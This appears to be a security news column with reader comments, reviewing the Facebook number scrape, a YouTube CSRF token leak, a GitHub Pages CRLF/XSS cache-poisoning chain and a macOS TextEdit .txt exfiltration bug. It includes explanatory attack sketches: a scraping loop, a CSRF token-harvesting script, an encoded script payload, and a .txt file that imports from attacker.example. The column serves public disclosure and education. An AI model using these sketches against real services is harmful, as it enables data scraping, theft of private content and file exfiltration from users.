Facebook had a problem, way back in the simpler times that were 2019. Roughly 533 million accounts had the cell phone number associated with the account leaked. It’s making security news this week because that database has now been released for free in its entirety. The dataset consists of Facebook ID, cell number, name, location, birthday, bio, and email address. Facebook has pointed out that the data was not from a hack or breach, but was simply scraped before a vulnerability was fixed in 2019.
The vulnerability was in Facebook’s contact import service, also known as the “Find Friends” feature. The short explanation is that anyone could punch in a random phone number and get back a bit of information about the FB account that claimed that number. The problem was that some interfaces to that service didn’t have appropriate rate limiting. Combine that with Facebook’s constant urging that everyone link a cell number to their account, and the default privacy setting that lets anyone locate you by your cell number, and the data scraping was all but inevitable. The actual technique may have been to spoof requests so they appeared to come from the official Facebook app.
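To see why the missing rate limiting mattered, here’s a minimal sketch of what such a scraper looks like, in TypeScript. The endpoint, request shape, and response fields are hypothetical stand-ins, not Facebook’s actual contact-import API:

```typescript
// Hypothetical sketch of the scraping loop described above. The
// endpoint and response shape are illustrative stand-ins, not
// Facebook's real contact-import API.
async function scrapeRange(start: number, count: number): Promise<void> {
  for (let i = 0; i < count; i++) {
    const phone = `+1555${String(start + i).padStart(7, "0")}`;
    // With no rate limiting, nothing stops a client from issuing
    // millions of these lookups, especially while masquerading as
    // the official mobile app.
    const res = await fetch("https://example.invalid/contact-import", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ contacts: [phone] }),
    });
    if (res.ok) {
      // e.g. { id, name, location } for the account claiming this number
      console.log(phone, await res.json());
    }
  }
}
```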
[Troy Hunt]’s Have I Been Pwned service has integrated this breach and now allows searching by phone number, so go check whether you’re one of the exposed. If you are, keep the leaked data in mind every time an email or phone call comes in from someone you don’t know.
Impersonating a TV
[David Schütz] was at a friend’s house, and pulled out his phone to show off a private YouTube video. Google has worked hard to make the Android/Chromecast/Android TV interconnect seamless, and that system was firing on all cylinders. With a simple button press, that private video played on his friend’s smart TV, and it seemed very wrong that this was so easy.
For background, a YouTube video can exist in one of three states. A normal video shows up for everyone, and there are no restrictions on watching it. An unlisted video doesn’t show up in search results or on the channel’s page; you have to have the link to see it. The third option is a private video. These aren’t visible to anyone, even with the direct link. To share a private video, the viewers have to be on the list of allowed viewers. Not on the list? No video for you. So how did a smart TV that wasn’t signed in to an authorized account manage to play the private video? The magic is a token that is generated when a user initiates the process. This “ctt” token serves as a single-purpose authenticator, allowing the TV to play the user’s private video.
This is a reasonable system, so long as everything is implemented securely. Spoilers: it wasn’t. The problem was a Cross-Site Request Forgery (CSRF) vulnerability. The magic token is intended to be generated only when a user requests it from YouTube itself. Because that intention wasn’t enforced, any site could request a token, so long as the video ID was known. Not only does the “cast to TV” process work with individual videos, it works with playlists, and it turns out that every YouTube account has a semi-hidden playlist consisting of every upload.
The attack flow goes like this: the victim visits the malicious website, and that site sends off a request for the user’s “uploads” playlist. Since the victim is logged in to YouTube and the request comes from their browser, the request is honored. Once the video IDs are known, a ctt token can be generated for each one. With that, the attacker has access to every video on the victim’s account, even the private ones. The fix was to implement proper CSRF protection and restrict API access to the official client.
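Here’s a rough sketch of how that flow might look from the attacker’s page. The endpoint paths, parameter names, and response shapes are assumptions for illustration only; the real internal YouTube API differs:

```typescript
// Sketch of the CSRF attack flow described above, as it might run from
// a malicious page in the victim's browser. Endpoints and response
// shapes are assumptions, not YouTube's actual API.
async function stealPrivateVideos(channelId: string): Promise<string[]> {
  // 1. Every account has a semi-hidden "uploads" playlist. The victim's
  //    browser attaches their YouTube cookies, so the request is honored
  //    even though it originates from the attacker's page.
  const uploads = await fetch(
    `https://example.invalid/playlist?list=UU${channelId}`,
    { credentials: "include" },
  ).then((r) => r.json());

  const tokens: string[] = [];
  for (const videoId of uploads.videoIds as string[]) {
    // 2. With no CSRF protection, any site could mint a "cast to TV"
    //    token for any known video ID, including private uploads.
    const { ctt } = await fetch(
      `https://example.invalid/get_ctt?video_id=${videoId}`,
      { credentials: "include" },
    ).then((r) => r.json());
    // 3. Each token lets an unauthenticated "TV" play that one video.
    tokens.push(ctt);
  }
  return tokens;
}
```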
CRLF to Access Private Pages
GitHub offers more than just code hosting. They also host GitHub Pages, and one of the features offered there is private pages. You can put together a web interface that uses GitHub accounts for authentication; set up your organization with different roles, and you can restrict a page to users with the appropriate role. GitHub is very interested in keeping those pages secure, so private pages are one of the areas covered by their bug bounty program.
[Robert Chen] had a very boring junior year of high school, thanks to COVID, and took up vulnerability hunting as a hobby. He started looking at GitHub and discovered a quirk. The authentication process sends a page_id value, and that value is embedded in the response. He discovered that he could use URL encoding to embed whitespace in the value. The authentication process would still succeed, but the resulting page included the whitespace. This suggests that the value is processed by a toInt() function, but the raw, user-supplied value is getting passed on. Better practice is to convert the parsed integer back to a string and use that as a known-trustworthy value.
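To illustrate the difference, here’s a small TypeScript sketch, using parseInt() as a stand-in for the lenient toInt() behavior described above (GitHub’s actual implementation isn’t public):

```typescript
// An attacker-controlled page_id, with trailing junk after the digits.
const raw = "12345 \r\n<script>alert(1)</script>";

// The lenient parse succeeds, so the authentication logic proceeds...
const pageId = parseInt(raw, 10); // 12345

// ...but the bug was reflecting the raw value, junk and all:
const unsafe = `page_id: ${raw}`;

// Safer: round-trip through the parsed integer, so only a canonical,
// known-trustworthy string ever reaches the response.
const safe = `page_id: ${String(pageId)}`; // "page_id: 12345"
```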
The attack is to embed a script tag in that ID, in such a way that the authentication logic still succeeds, but the attacker’s code runs on the victim’s page. This is accomplished by a series of Carriage Returns and Line Feeds (CRLF), followed by an encoded null byte. The toInt() function stops processing as soon as it sees the null, but the payload is still passed on. The next step was taking advantage of inconsistent case sensitivity: one part of the process sees “__HOST” and “__Host” as identical.
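A hypothetical payload shape, showing why the lenient parse succeeds while the markup survives. The exact encoding GitHub accepted is simplified here:

```typescript
// Sketch of the payload shape described above. %00 is the URL-encoded
// null byte; %0D%0A is an encoded CRLF pair.
const encoded =
  "1337" +           // leading digits keep the lenient toInt() happy
  "%0D%0A%0D%0A" +   // CRLF pairs break out of the original context
  "%00" +            // the null byte where toInt() stops reading...
  "%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"; // ...but this survives

// After decoding, the value parses cleanly as a number yet still
// carries live markup when reflected verbatim:
const decoded = decodeURIComponent(encoded);
console.log(parseInt(decoded, 10)); // 1337
```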
The last piece of the puzzle is cache poisoning. GitHub makes use of caching in the authentication flow, and without the above issues it would be reasonably secure. The cache lookup is based on the result of toInt(), so if an attacker’s malicious request is the one that populates the cache, every visitor could potentially run the embedded script. His research netted him a nice $35,000, and GitHub cleaned up the problems within a month.
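A minimal model of that cache-poisoning step, with parseInt() again standing in for toInt() and a plain Map standing in for the cache:

```typescript
// Minimal model of the cache-poisoning step: the cache key comes from
// the parsed integer, but the cached body was built from the raw value.
const cache = new Map<number, string>();

function render(rawPageId: string): string {
  const key = parseInt(rawPageId, 10); // lenient toInt() stand-in
  const hit = cache.get(key);
  if (hit !== undefined) return hit;

  const body = `page_id: ${rawPageId}`; // raw value baked into the page
  cache.set(key, body);
  return body;
}

// The attacker primes the cache with an injected payload...
render("42\r\n\u0000<script>evil()</script>");
// ...and every later visitor requesting the legitimate page 42 is
// served the poisoned entry, script and all:
console.log(render("42"));
```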
When a txt File Is HTML
How does an OS determine what to do with a given file? The two primary approaches are the filename extension and the contents of the file, and sometimes the exact response is determined by a combination of both. It’s potentially complicated, and such complications can give rise to security issues. Case in point: CVE-2019-8761. As you might notice from the year embedded in the CVE, [Paulos Yibelo] didn’t get into a huge hurry to publish his work. That aside, this CVE is all about how macOS handles .txt files that contain HTML code.
TextEdit is the default program used to open a text document, but it has support for bold text, different text colors, etc. In short, there’s more going on than raw text editing. The question then becomes: how much will TextEdit let you get away with? Quite a bit. If that text file starts out with an HTML doctype, TextEdit parses the HTML rather than letting the user edit it. It’s not quite broken enough to run JavaScript, but there are still some shenanigans to be had. Inside a pair of style tags, it’s possible to import an external stylesheet. While that imported stylesheet is external to the .txt file, the import is still limited to the local filesystem. This would be the end of the story, and the most we could do is something mischievous like importing /dev/urandom and crashing the machine.
macOS has an interesting feature called AutoFS, which auto-mounts remote locations onto the local filesystem. This feature doesn’t require any special privileges, so it’s easy enough to include a file from a remote server the attacker controls. That’s enough to do something interesting. [Paulos] drops a casual bombshell: he also happened to find a way for a website to automatically download a .txt file and open it without any user interaction. Armed with this knowledge, an attacker could host a simple text file on a Tor server and collect the real IP addresses of each visitor.
If that wasn’t enough, a bit of trickery with an unclosed style tag allows our rogue text file to include the contents of a local file as part of the outgoing request. The result is that any file the TextEdit process can read, it can also upload to the attacker. The final macOS quirk to make this even more interesting? Gatekeeper, the part of the OS that tries to prevent running potentially malicious code, totally ignores .txt files. [Paulos] privately reported his findings to Apple in 2019, and he believes it was fixed in 2019 or early 2020.
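Putting the pieces together, here’s a hypothetical reconstruction of what such a .txt file might look like, based on the description above. The /net/ AutoFS path and the hostname are illustrative; the exfiltration variant additionally leaves a style tag unclosed so that following content is swallowed into the request:

```typescript
import { writeFileSync } from "node:fs";

// Hypothetical reconstruction of the malicious .txt file, based on the
// description above. The /net/ AutoFS path and hostname are illustrative.
const payload = `<!DOCTYPE html>
<html>
<head>
<style>
/* AutoFS transparently mounts the remote host's NFS exports under
   /net/, so this "local filesystem" import actually reaches out to
   attacker.example, leaking the visitor's real IP in the process. */
@import url("/net/attacker.example/exports/style.css");
</style>
</head>
</html>`;

// The exfiltration variant instead leaves a style tag unclosed, so the
// file contents that follow are swallowed into the outgoing request.
writeFileSync("innocent-looking.txt", payload);
```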
Google’s Hard Decision Ends an Op
A couple weeks ago, news broke about who was behind a series of attacks covered by Google’s Project Zero. The attacks in question were part of a counter-terrorism operation run by a Western government. Google discovered the attack, reverse-engineered the vulnerabilities, and made its findings public without providing any details about who was behind it. The move has become controversial, because it likely killed the op before it got results. It raises an interesting question: what are the responsibilities of a researcher who finds a vulnerability being used by a friendly government? Even when the researcher believes in the mission of the operation in question?
Google seems to have taken a justice-is-blind sort of approach: if they find the attack happening, they respond the same way, regardless of who is behind it. I suspect this is based partly on the assumption that if Google has detected and reverse-engineered the attack, so have the usual suspects. If they sit on the findings, the op can proceed, but APT groups from less friendly countries could reverse engineer and use the exploits as well. What do you think, Hackaday: should Project Zero sit on vulnerabilities if a friendly government is behind the exploits? [Editor’s bonus question: Should “friendly” governments, tasked with protecting the security of their own citizens’ Internet, sit on vulnerabilities? If “yes”, with what oversight?] Let us know what you think about that and the rest of the stories below!
The answer to the Project Zero issue is simple: notify the “friendly” government in question, when the exploit is discovered, that you will be releasing the details on the vulnerability. While Project Zero finishes the write-up and fully understands the vulnerability, the government can switch to using a different one. No government is owed an exploit; they merely use them while they still exist.
As for the bonus question: sitting on vulnerabilities for globally used software is like making a suicide pact because all nations are vulnerable. It seems like it would be a far better idea to find vulnerabilities in regionally used software.
A likely outcome would be that “friendly” government getting a gag order (court order, NSL, etc.) to prevent the release of the information related to their activity.
Also, on the “No government is owed an exploit” point: what if that government paid $10M for the vulnerability to exist:
https://www.theverge.com/2013/12/20/5231006/nsa-paid-10-million-for-a-back-door-into-rsa-encryption-according-to
Sitting on vulns does hurt everybody, other than criminals and a few small government agencies that sometimes behave like criminals. Ultimately, releasing the details on the vulnerability helped protect that “friendly” government (and all other governments), even though it may hamper the (sometimes questionable) activities of a small branch of that government.
Not an easy question in a world founded on antagonistic relationships and “friends” as a relative concept.
“My enemy’s enemy is my friend.”
My enemy’s enemy is my enemy’s enemy, nothing more.
Also: pillage _then_ burn.
A somewhat naive response which ignores the nuances of reality; the world is not black and white.
Fix the vulnerability immediately, notify nobody. If some government found it, they should be able to find a new one. They are no better than a malicious attacker, no matter their justification.
TXT file vulnerability: this is why plain text email is the only reasonable email. Using embedded HTML, etc., is a major hole. I wish that the client I am required to use for work allowed plain text. (The software from the north-west USA nominally does, but in my case it neither allows it for sending, nor allows disabling interpretation on received mail, by “institutional policy”.)
+1
I will regularly receive emails tens to hundreds of kilobytes in size with no renderable text outside HTML. Not even the courtesy message that the content is in HTML. These emails do not come from vague senders, but from the largest rail service provider here, for one. Except of course when they really need something from me. Then they will send a plain text email. They are very aware of what they are doing.
If the op was a justifiable op, then a warrant may suffice to continue it. If the op wasn’t gathering information available through a warrant process, then the government was exploiting Google’s trust to take non-Google actions. The fix for that is to publicly announce the feds have been shut out. Wink wink…
If the government really wanted to exploit that trust, they could use their root cert to MITM Google for that particular audience.
I’m a little doubtful that the government was shut out of an ongoing op against its will.
You missed the LinkedIn leak https://cybernews.com/news/stolen-data-of-500-million-linkedin-users-being-sold-online-2-million-leaked-as-proof-2/
IIRC, I didn’t give Fakebuck my cell number because I didn’t trust them.
LinkedIn on the other hand…
Your enemy’s enemy did.
B^)
I cringed extremely at people still being under the impression that Rick Rolling someone in 2021 is still funny.
Get your hat, gramps! Impressive hack though.
Wow, macOS is worse than I thought… The first rule of secure programming is “Don’t trust anything the user gives you”, and that includes file extensions.
I mean, every time I hear about vulnerabilities in BSD, it’s always “If the attacker can somehow get this exact sequence of unrelated inputs to arrive at the machine, and correctly guess a series of addresses, and the moon is in the right position, and a flock of 7 starlings passes by the window going west at 3 kph, it may be possible to deduce the first bit of a private key, if the attacker has access to the buffer of the 7th serial port on the system”.
But when I hear about Mac software bugs, it’s things like “you can log in as root if you mash the ‘Okay’ button enough times”…
English or African starlings?
Laden or unladen?
I…I don’t know…
*Fwoosh*
“Friendly” government? Trustworthy government? Is there one?
Easy answer: there are no friendly governments, and they should publish!
“I’m a little doubtful that the government was shut out of an ongoing op against its will.”
I don’t think you understand what actually happened.
1. Exploits were found and used by a government, and they allow for an operation.
2. Google finds the same vulnerabilities, and tracks their use.
3. Google patches its services to remove the vulnerabilities, and properly discloses them so that others can also patch.
4. The vulnerabilities are gone, so the government can’t keep using them. The OP is done.
I think there is also a bit of confusion about what an “Operation” actually is.
An OP is not the intent to do something. It is the ACTUAL doing of the thing.
It’s just like the “surgery” use of the word.
If a company doesn’t ship out a knee replacement, then the Operation to install that part is stopped.
It doesn’t mean that the person doesn’t still need/want a knee replacement.
Nor does it mean that they won’t re-order the part and re-schedule the operation.
The government that had their OP stopped isn’t going to drop everything.
But they WILL need to develop and run a NEW OP.